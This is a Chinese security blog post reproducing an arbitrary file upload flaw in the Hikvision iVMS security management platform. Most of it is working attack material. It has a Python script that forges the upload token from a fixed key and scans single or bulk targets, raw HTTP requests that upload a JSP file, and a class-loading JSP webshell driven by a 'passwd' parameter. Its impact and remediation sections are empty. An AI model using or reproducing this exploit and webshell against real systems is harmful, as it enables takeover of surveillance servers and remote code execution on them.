声明:本公众号所发布的文章及工具只限交流学习,如有侵权,请告知我们立即删除,文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
0x01 产品简介
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。
0x02 漏洞概述
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
0x03 影响范围
0x04 复现环境
0x05 漏洞复现
import requests
import urllib3
import urllib
import hashlib
import argparse
from colorama import init
from colorama import Fore
init(autoreset=True)
urllib3.disable_warnings()
head = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
"Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"
}
def md5encode(url):
if url.endswith("/"):
path = "eps/api/resourceOperations/uploadsecretKeyIbuilding"
else:
path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding"
encodetext = url + path
input_name = hashlib.md5()
input_name.update(encodetext.encode("utf-8"))
return (input_name.hexdigest()).upper()
def poc(url):
if url.endswith("/"):
path = "eps/api/resourceOperations/upload?token="
else:
path = "/eps/api/resourceOperations/upload?token="
pocurl = url + path + md5encode(url)
data = {
"service": urllib.parse.quote(url + "/home/index.action")
}
try:
response = requests.post(url=pocurl,headers=head,data=data,verify=False,timeout=3)
if response.status_code==200:
print(Fore.GREEN + f"[+]{url}存在海康威视iVMS 综合安防任意文件上传漏洞!!!!")
else:
print(Fore.RED + f"[-]{url}不存在海康威视iVMS 综合安防任意文件上传漏洞")
except:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxxnpython3 ivms.py -f file.txt',
description='ivms漏洞检测poc',
)
p = parser.add_argument_group('ivms 的参数')
p.add_argument("-u", "--url", type=str, help="测试单条url")
p.add_argument("-f", "--file", type=str, help="测试多个url文件")
args = parser.parse_args()
if args.url:
poc(args.url)
if args.file:
for i in open(args.file,"r").read().split("n"):
poc(i)
python3 ivms-poc.py -u url
多个url检测:
python3 ivms-poc.py -f file.txt
POST /eps/api/resourceOperations/upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://you-ip
Connection: close
Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9
Upgrade-Insecure-Requests: 1
Content-Length: 62
service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action
POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryGEJwiloiPo
0x06 漏洞利用
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
上传成功,尝试连接
0x07 修复建议
原文始发于微信公众号(西山云安):海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论